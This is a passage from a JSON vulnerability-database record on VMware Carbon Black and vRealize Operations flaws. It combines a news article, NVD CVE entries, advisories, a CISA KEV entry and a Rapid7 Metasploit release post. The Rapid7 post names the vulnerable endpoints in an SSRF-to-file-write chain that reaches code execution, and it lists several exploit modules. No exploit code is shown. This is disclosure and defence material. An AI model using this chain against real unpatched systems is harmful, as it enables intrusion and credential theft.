in AppC is only the latest critical problem that VMware has addressed. In February, for one, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code-execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\nMore recently, in April, another [critical cloud bug](<https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/>), again in VMWare Carbon Black, would have allowed takeover. The bug (CVE-2021-21982) ranked 9.1 out of 10 on the CVSS vulnerability-severity scale. It would enable privilege escalation and the ability to take over the administrative rights for the VMware Carbon Black Cloud Workload appliance.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. **\n", "cvss3": {}, "published": "2021-06-24T15:31:31", "type": "threatpost", "title": "Critical VMware Carbon Black Bug Allows Auth Bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580", "CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T15:31:31", "id": "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "href": "https://threatpost.com/vmware-carbon-black-authentication-bypass/167226/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:56:08", "description": "VMware Carbon Black Cloud Workload appliance 1.0.0 and 1.01 has an authentication bypass vulnerability that may allow a malicious actor with network access to the administrative interface of the VMware Carbon Black Cloud Workload appliance to obtain a valid authentication token. Successful exploitation of this issue would result in the attacker being able to view and alter administrative configuration settings.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T19:15:00", "type": "cve", "title": "CVE-2021-21982", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T16:29:00", "cpe": ["cpe:/a:vmware:carbon_black_cloud_workload:1.0.1"], "id": "CVE-2021-21982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21982", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:vmware:carbon_black_cloud_workload:1.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:55:56", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:56:09", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21983", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, therefore databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database related modules!\n\nThe first, an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreter's would execute command issued through `sessions -c` where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-23T23:31:36", "description": "A sever-side request forgery vulnerability exists in VMware vRealize Operations Manager. Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-07T16:06:23", "description": "An arbitrary file write vulnerability exists in VMware vRealize Operations Manager API. Successful exploitation of this vulnerability could result in code execution on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-07T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Arbitrary File Write (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0230", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-02-16T19:33:27", "description": "URL Directory Traversal Over HTTP Traffic.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-21T00:00:00", "type": "checkpoint_advisories", "title": "URL Directory Traversal Over HTTP Traffic (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2021-04-21T00:00:00", "id": "CPAI-2021-0234", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:55", "description": "[](<https://thehackernews.com/images/-j136_z7UZNc/YNQ7Y__WRWI/AAAAAAAAC-U/oIYaMgYSXVYLJkHR5taYmCdxvH79jX-ewCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has rolled out security updates to resolve a critical flaw affecting Carbon Black App Control that could be exploited to bypass authentication and take control of vulnerable systems.\n\nThe vulnerability, identified as CVE-2021-21998, is rated 9.4 out of 10 in severity by the industry-standard Common Vulnerability Scoring System (CVSS) and affects App Control (AppC) versions 8.0.x, 8.1.x, 8.5.x, and 8.6.x.\n\n[Carbon Black App Control](<https://www.carbonblack.com/products/app-control/>) is a security solution designed to lock down critical systems and servers to prevent unauthorized changes in the face of cyber-attacks and ensure compliance with regulatory mandates such as PCI-DSS, HIPAA, GDPR, SOX, FISMA, and NERC.\n\n\"A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate,\" the California-based cloud computing and virtualization technology company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>) in an advisory.\n\nCVE-2021-21998 is the second time VMware is addressing an authentication bypass issue in its Carbon Black endpoint security software. Earlier this April, the company fixed an incorrect URL handling vulnerability in the Carbon Black Cloud Workload appliance ([CVE-2021-21982](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>)) that could be exploited to gain access to the administration API. \n\nThat's not all. VMware also patched a local privilege escalation bug affecting VMware Tools for Windows, VMware Remote Console for Windows (VMRC for Windows), and VMware App Volumes (CVE-2021-21999, CVSS score: 7.8) that could allow a bad actor to execute arbitrary code on affected systems.\n\n\"An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges,\" VMware 